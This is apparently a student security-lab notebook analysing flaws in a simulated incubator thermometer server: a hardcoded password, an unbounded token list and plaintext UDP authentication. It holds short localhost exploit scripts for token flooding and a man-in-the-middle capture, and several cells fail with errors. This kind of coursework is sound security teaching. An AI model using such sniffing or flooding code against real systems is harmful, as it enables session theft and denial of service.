# Group 21 Lab 5
##### Group Members: (Andrew Quijano, afq2003), (Isaiah Genis | ig596), (Jamie Leach | jhl925), (Yevhen Pankevych | yp2525)

Your first goal as a Security Engineer who wants to ensure the security of the application is to identify security vulnerabilities in the project and create testcases to exploit them. In the real world, applications are often tested with test scripts. The following are a few questions a Security Engineer would ask when writing a testcase to test the Security of their application:

* "Does this application protect the confidentiaility of data?"
* "Does this application hamper performance?"
* "Does this application prevent actions that shoudl be allowed?"

Notice that these questions are parallel to security paradigms: Security, Efficiency and Accuracy, Availability. If you can find a hypothesis where a security paradigm is not met that would mean the application is not secure and a possible exploit exist. The testcases can be written in python or bash.

### Task:
We have listed hints for 3 vulnerabilities below which are currently present in code. Your task is to explain how it violates the security regulations (in terms of the above questions) and then provide the testcases to demonstrate how these vulnerabilities can be exploited.
* Password is Hardcoded (SampleNetworkClient.py)
* Token List has the potential to continuously grow (SampleNetworkServer.py)
* Plaintext authentication token and authentication (SampleNetworkClient.py)

### Submission:
For each vulnerability above:

1. describe how it answers the three questions mentioned above.
2. Provide test cases (in python or bash) to demonstrate how these vulnerabilities can be exploited.

### Part 1: Describe how each Vulnerability answers the three questions mentioned above.

#### Password is Hardcoded (SampleNetworkClient.py)

* "Does this application protect the confidentiality of data?"
    * No, Because the Password is Hardcoded (SampleNetworkClient.py) the application cannot protect the confidentiality of data. 
       1. This is because a vulnerability was discovered in the ‘SampleNetworkClient.py’ part of the application, shown below, which contains a function that passes/stores a hardcoded password value to send it within a message to the Server side socket. Hardcoded credentials generally pose a security risk to an application as an attacker can reverse engineer the code to obtain the password to use elsewhere. In this case an attacker would be able to impersonate/seize the client’s account as their username/password has been exposed. The relevant code has been commented below and a test case has been written in Python/Bash to demonstrate how to exploit this vulnerability.

In [10]:
##### SampleNetworkClient.py:
def authenticate(self, p, pw) : #pw variable here takes in raw input from user/client calling the function.
        s = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
        s.sendto(b"AUTH %s" % pw, ("127.0.0.1", p)) #pw variable here is exposed and/or is not used in authentication
        msg, addr = s.recvfrom(1024)
        return msg.strip()

* "Does this application hamper performance?"
    * No in most cases a hardcoded password mentioned before usually speeds up the overall client/user experience in authentication however this poses a risk to the overall security/performance as the password is not able to be easily changed if it has been compromised. 

* "Does this application prevent actions that should be allowed?"
    * No, Because the password is hardcoded into the application an attacker can easily hijack a user profile/session in order to preform 'unintended' actions at that layer. Additionally there is no 'trust' model with a hard coded credential, in theory it would be hard to differentiate what user and activity should be allowed vs those that are not.

#### Token List has the potential to continuously grow (SampleNetworkServer.py)

* "Does this application protect the confidentiality of data?"

    * No, Because the Token List has the potential to continuously grow (SampleNetworkServer.py) the application cannot ensure the confidentiality of data. 
        1. This is because the continually growing list of tokens and which tie to user related sessions can be used to identify/track valid logged in user sessions and does so in one continuously growing list...providing a single point of attack/failure as well. Plaintext session tokens continuously added to a list overall can compromise active sessions within the application as an attacker can easily identify which user/session is running on the system and could potentially terminate a client’s session and can also lead to a Man-in-the-middle attack, which allows an attacker to obtain an unencrypted token and use it to either impersonate and act on behalf of a legitimate user or to observe traffic between the server and the host.

* "Does this application hamper performance?"

    * Yes, the application currently hampers performance in several ways:
        1. A vulnerability was discovered in the ‘SampleNetworkServer.py’ part of the application which allows the array “self.tokens”, that is used to stores generated token values for each authenticated session, to continuously grow if authenticated sessions continually occur without ‘logouts’. This vulnerability can lead to performance issues should the list become too long and could also lead to a buffer overflow if attacked. The relevant code has been commented below and a test case has been written in Python/Bash to demonstrate this vulnerability.

In [13]:
# SampleNetworkServer.py
def processCommands(self, msg, addr) :
        cmds = msg.split(';')
        for c in cmds :
            cs = c.split(' ')
            if len(cs) == 2 : #should be either AUTH or LOGOUT
                if cs[0] == "AUTH":
                    if cs[1] == "!Q#E%T&U8i6y4r2w" :
                        self.tokens.append(''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16)))
                        #self.tokens.append is a vulnerability as there is no limit specified for the array
                        self.serverSocket.sendto(self.tokens[-1].encode("utf-8"), addr)
                        #print (self.tokens[-1])
                elif cs[0] == "LOGOUT":
                    if cs[1] in self.tokens :
                        self.tokens.remove(cs[1])


* "Does this application prevent actions that should be allowed?"

    * Yes, this system has potential vulnerabilities that can cause a refusal to perform the correct action
        1. Also, the system can potentially become unavailable due to a DOS attack aimed at overflowing the list of available tokens or calling the logout procedure with any data (‘SampleNetworkServer.py’) - this is possible due to the fact that the size of the list is not fixed and can be quite large - then the time to search for an invalid token will be equal to the viewing time of all items in the list, which can cause delays in the operation of the server, up to the failure of its operation. The relevant code has been highlighted below.

In [ ]:
def processCommands(self, msg, addr) :
        cmds = msg.split(';')
        for c in cmds :
            cs = c.split(' ')
            if len(cs) == 2 : #should be either AUTH or LOGOUT
                if cs[0] == "AUTH":
                    if cs[1] == "!Q#E%T&U8i6y4r2w" :
                        self.tokens.append(''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16)))
                        self.serverSocket.sendto(self.tokens[-1].encode("utf-8"), addr)
                        #print (self.tokens[-1])
                elif cs[0] == "LOGOUT":
                    if cs[1] in self.tokens :#The array is not fixed limit and could DDOS system if the list becomes too large/attacked 
                        self.tokens.remove(cs[1])
                else : #unknown command
                    self.serverSocket.sendto(b"Invalid Command\n", addr)

#### Plaintext authentication token and authentication (SampleNetworkClient.py)

* Does this application protect the confidentiality of data?"

    * No, Because the authentication token and authentication is sent across in plaintext (SampleNetworkClient.py) the application cannot ensure the confidentiality of data. 
        1. This vulnerability was discovered in the ‘SampleNetworkClient.py’ & ‘SampleNetworkServer.py’ part of the application, shown below, which contains plaintext authentication tokens, which are values used to identify/track valid logged in user sessions and passes these values between the Client and Server side sockets. Plaintext session tokens jeopardize active sessions within the application as an attacker can easily identify which user/session is running on the system and could potentially terminate a client’s session. This vulnerability also enables a Man-in-the-middle attack, which allows an attacker to obtain an unencrypted token and use it to impersonate and act on behalf of a legitimate user. The relevant code has been commented below and a test case has been written in Python/Bash to demonstrate how to exploit this vulnerability.

In [8]:
#SampleNetworkClient.py:
def updateInfTemp(self, frame) :
        self.updateTime()
        if self.infToken is None : #not yet authenticated
            self.infToken = self.authenticate(self.infPort, b"!Q#E%T&U8i6y4r2w") # this token is exposed/plaintext

  def updateIncTemp(self, frame) :
        self.updateTime()
        if self.incToken is None : #not yet authenticated
            self.incToken = self.authenticate(self.incPort, b"!Q#E%T&U8i6y4r2w") # this token is exposed/plaintext

IndentationError: unindent does not match any outer indentation level (<tokenize>, line 7)

In [9]:
#SampleNetworkServer.py:
if len(cs) == 2 : #should be either AUTH or LOGOUT
                if cs[0] == "AUTH":
                    if cs[1] == "!Q#E%T&U8i6y4r2w" : # this token is exposed/plaintext
                        self.tokens.append(''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16)))
                        self.serverSocket.sendto(self.tokens[-1].encode("utf-8"), addr)


NameError: name 'cs' is not defined

* "Does this application hamper performance?"
    * Yes technically an unencrypted/plaintext token or password can be used to hamper system preformance as the unencrypted token/pass, as mentioned earlier, can be intercepted by an attacker and used to cause deauthentication of that user. Thus, a legitimate user will lose access to the system and require re-authentication.

* "Does this application prevent actions that should be allowed?"
    * Yes and No, Because the authentication token is passed plaintext into the application an attacker can easily intercept these and hijack a users session in order to preform 'unintended' actions. However compromised authentication tokens can in theory be regenerated for a user easily compared to a password.

### Part 2
Sample exploit scirpts intended to be written in the SampleNetwork Server.py script to run

In [2]:
# 1- Get Hard Coded Password
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.1", 23456))
print("sent")
token, addr = sock.recvfrom(1024)
token = token.decode()
print("token", token)
sock.sendto(("LOGOUT " + token).encode(), ("127.0.0.1", 23456))

NameError: name 'socket' is not defined

In [3]:
# 2- Token List Grows, probably increase to VERY big number?
for i in range(10):
    sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.1", 23456))
    token, addr = sock.recvfrom(1024)
    token = token.decode()
    print("DDOS LIST TOKEN", token)

    # because an invalid token is passed, no token is removed in self.list
    sock.sendto(b"LOGOUT random-token", ("127.0.0.1", 23456))

NameError: name 'sock' is not defined

In [4]:
#Exploit script for “Plaintext authentication token and authentication ”:

import socket
import fcntl
import os

serverSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
serverSocket.bind(("127.0.0.2", 23456))
fcntl.fcntl(serverSocket, fcntl.F_SETFL, os.O_NONBLOCK)

clientSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)

#let's assume that this is a proxy and client connected to it, thinking it is a real server
while True:
    msg, addr = serverSocket.recvfrom(1024)
    
    print("Hacked Message: ", msg, addr)
    
    clientSocket.sendto(msg, ("127.0.0.1", 23456))
    
    serverSocket.sendto(server_msg, addr) #send server answer back to the user


ModuleNotFoundError: No module named 'fcntl'

In [5]:
# 3- Plaintext authentication, use MITM to capture stuff
mitmSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
mitmSocket.bind(("127.0.0.2", 23456))
fcntl.fcntl(mitmSocket, fcntl.F_SETFL, os.O_NONBLOCK)

# 3 Client authenticates, MITM grabs Client Auth Token
sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.2", 23456))
auth_password, client_addr = mitmSocket.recvfrom(1024)
print("MITM STOLE", auth_password)

NameError: name 'fcntl' is not defined

In [6]:
# MITM captures plaintext password and forwards to server.
mitmSocket.sendto(auth_password, ("127.0.0.1", 23456))
# Give MITM time to send the request and have the token stealing time to complete.
time.sleep(5)
token, real_server_addr = mitmSocket.recvfrom(1024)
print("MITM STOLE TOKEN", token, real_server_addr)

NameError: name 'auth_password' is not defined

### Extra:
Full Samplenetworkserver.py including the above mentioned scripts

In [1]:
import threading
import matplotlib.pyplot as plt
import matplotlib.animation as animation
import infinc
import time
import math
import socket
import fcntl
import os
import errno
import random
import string
from SampleNetworkClient import *

class SmartNetworkThermometer (threading.Thread) :
    open_cmds = ["AUTH", "LOGOUT"]
    prot_cmds = ["SET_DEGF", "SET_DEGC", "SET_DEGK", "GET_TEMP", "UPDATE_TEMP"]

    def __init__ (self, source, updatePeriod, port) :
        threading.Thread.__init__(self, daemon = True) 
        #set daemon to be true, so it doesn't block program from exiting
        self.source = source
        self.updatePeriod = updatePeriod
        self.curTemperature = 0
        self.updateTemperature()
        self.tokens = []

        self.serverSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
        self.serverSocket.bind(("127.0.0.1", port))
        fcntl.fcntl(self.serverSocket, fcntl.F_SETFL, os.O_NONBLOCK)

        self.deg = "K"

    def setSource(self, source) :
        self.source = source

    def setUpdatePeriod(self, updatePeriod) :
        self.updatePeriod = updatePeriod 

    def setDegreeUnit(self, s) :
        self.deg = s
        if self.deg not in ["F", "K", "C"] :
            self.deg = "K"

    def updateTemperature(self) :
        self.curTemperature = self.source.getTemperature()

    def getTemperature(self) :
        if self.deg == "C" :
            return self.curTemperature - 273
        if self.deg == "F" :
            return (self.curTemperature - 273) * 9 / 5 + 32

        return self.curTemperature

    def processCommands(self, msg, addr) :
        cmds = msg.split(';')
        for c in cmds :
            cs = c.split(' ')
            if len(cs) == 2 : #should be either AUTH or LOGOUT
                if cs[0] == "AUTH":
                    if cs[1] == "!Q#E%T&U8i6y4r2w" :
                        self.tokens.append(''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16)))
                        self.serverSocket.sendto(self.tokens[-1].encode("utf-8"), addr)
                        #print (self.tokens[-1])
                elif cs[0] == "LOGOUT":
                    if cs[1] in self.tokens :
                        self.tokens.remove(cs[1])
                else : #unknown command
                    self.serverSocket.sendto(b"Invalid Command\n", addr)
            elif c == "SET_DEGF" :
                self.deg = "F"
            elif c == "SET_DEGC" :
                self.deg = "C"
            elif c == "SET_DEGK" :
                self.deg = "K"
            elif c == "GET_TEMP" :
                self.serverSocket.sendto(b"%f\n" % self.getTemperature(), addr)
            elif c == "UPDATE_TEMP" :
                self.updateTemperature()
            elif c :
                self.serverSocket.sendto(b"Invalid Command\n", addr)


    def run(self) : #the running function
        while True : 
            try :
                msg, addr = self.serverSocket.recvfrom(1024)
                msg = msg.decode("utf-8").strip()
                cmds = msg.split(' ')
                if len(cmds) == 1 : # protected commands case
                    semi = msg.find(';')
                    if semi != -1 : #if we found the semicolon
                        #print (msg)
                        if msg[:semi] in self.tokens : #if its a valid token
                            self.processCommands(msg[semi+1:], addr)
                        else :
                            self.serverSocket.sendto(b"Bad Token\n", addr)
                    else :
                            self.serverSocket.sendto(b"Bad Command\n", addr)
                elif len(cmds) == 2 :
                    if cmds[0] in self.open_cmds : #if its AUTH or LOGOUT
                        self.processCommands(msg, addr) 
                    else :
                        self.serverSocket.sendto(b"Authenticate First\n", addr)
                else :
                    # otherwise bad command
                    self.serverSocket.sendto(b"Bad Command\n", addr)
    
            except IOError as e :
                if e.errno == errno.EWOULDBLOCK :
                    #do nothing
                    pass
                else :
                    #do nothing for now
                    pass
                msg = ""

 

            self.updateTemperature()
            time.sleep(self.updatePeriod)


class SimpleClient :
    def __init__(self, therm1, therm2) :
        self.fig, self.ax = plt.subplots()
        now = time.time()
        self.lastTime = now
        self.times = [time.strftime("%H:%M:%S", time.localtime(now-i)) for i in range(30, 0, -1)]
        self.infTemps = [0]*30
        self.incTemps = [0]*30
        self.infLn, = plt.plot(range(30), self.infTemps, label="Infant Temperature")
        self.incLn, = plt.plot(range(30), self.incTemps, label="Incubator Temperature")
        plt.xticks(range(30), self.times, rotation=45)
        plt.ylim((20,50))
        plt.legend(handles=[self.infLn, self.incLn])
        self.infTherm = therm1
        self.incTherm = therm2

        self.ani = animation.FuncAnimation(self.fig, self.updateInfTemp, interval=500)
        self.ani2 = animation.FuncAnimation(self.fig, self.updateIncTemp, interval=500)

    def updateTime(self) :
        now = time.time()
        if math.floor(now) > math.floor(self.lastTime) :
            t = time.strftime("%H:%M:%S", time.localtime(now))
            self.times.append(t)
            #last 30 seconds of of data
            self.times = self.times[-30:]
            self.lastTime = now
            plt.xticks(range(30), self.times,rotation = 45)
            plt.title(time.strftime("%A, %Y-%m-%d", time.localtime(now)))


    def updateInfTemp(self, frame) :
        self.updateTime()
        self.infTemps.append(self.infTherm.getTemperature()-273)
        #self.infTemps.append(self.infTemps[-1] + 1)
        self.infTemps = self.infTemps[-30:]
        self.infLn.set_data(range(30), self.infTemps)
        return self.infLn,

    def updateIncTemp(self, frame) :
        self.updateTime()
        self.incTemps.append(self.incTherm.getTemperature()-273)
        #self.incTemps.append(self.incTemps[-1] + 1)
        self.incTemps = self.incTemps[-30:]
        self.incLn.set_data(range(30), self.incTemps)
        return self.incLn,

UPDATE_PERIOD = .05 #in seconds
SIMULATION_STEP = .1 #in seconds

#create a new instance of IncubatorSimulator
bob = infinc.Human(mass = 8, length = 1.68, temperature = 36 + 273)
#bobThermo = infinc.SmartThermometer(bob, UPDATE_PERIOD)
bobThermo = SmartNetworkThermometer(bob, UPDATE_PERIOD, 23456)
bobThermo.start() #start the thread

inc = infinc.Incubator(width = 1, depth=1, height = 1, temperature = 37 + 273, roomTemperature = 20 + 273)
#incThermo = infinc.SmartNetworkThermometer(inc, UPDATE_PERIOD)
incThermo = SmartNetworkThermometer(inc, UPDATE_PERIOD, 23457)
incThermo.start() #start the thread

incHeater = infinc.SmartHeater(powerOutput = 1500, setTemperature = 45 + 273, thermometer = incThermo, updatePeriod = UPDATE_PERIOD)
inc.setHeater(incHeater)
incHeater.start() #start the thread

sim = infinc.Simulator(infant = bob, incubator = inc, roomTemp = 20 + 273, timeStep = SIMULATION_STEP, sleepTime = SIMULATION_STEP / 10)

sim.start()

sc = SimpleClient(bobThermo, incThermo)

# Write Test cases

# 1- Get Hard Coded Password
sock = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.1", 23456))
print("sent")
token, addr = sock.recvfrom(1024)
token = token.decode()
print("token", token)
sock.sendto(("LOGOUT " + token).encode(), ("127.0.0.1", 23456))

# 2- Token List Grows, probably increase to VERY big number?
for i in range(10):
    sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.1", 23456))
    token, addr = sock.recvfrom(1024)
    token = token.decode()
    print("DDOS LIST TOKEN", token)

    # because an invalid token is passed, no token is removed in self.list
    sock.sendto(b"LOGOUT random-token", ("127.0.0.1", 23456))

# 3- Plaintext authentication, use MITM to capture stuff
mitmSocket = socket.socket(family=socket.AF_INET, type=socket.SOCK_DGRAM)
mitmSocket.bind(("127.0.0.2", 23456))
fcntl.fcntl(mitmSocket, fcntl.F_SETFL, os.O_NONBLOCK)

# Client authenticates, MITM grabs Client Auth Token
sock.sendto(b"AUTH !Q#E%T&U8i6y4r2w", ("127.0.0.2", 23456))
auth_password, client_addr = mitmSocket.recvfrom(1024)
print("MITM STOLE", auth_password)

# MITM captures plaintext password and forwards to server.
mitmSocket.sendto(auth_password, ("127.0.0.1", 23456))
# Give MITM time to send the request and have the token stealing time to complete.
time.sleep(5)
token, real_server_addr = mitmSocket.recvfrom(1024)
print("MITM STOLE TOKEN", token, real_server_addr)

# End Test cases

plt.grid()
plt.show()

ModuleNotFoundError: No module named 'matplotlib'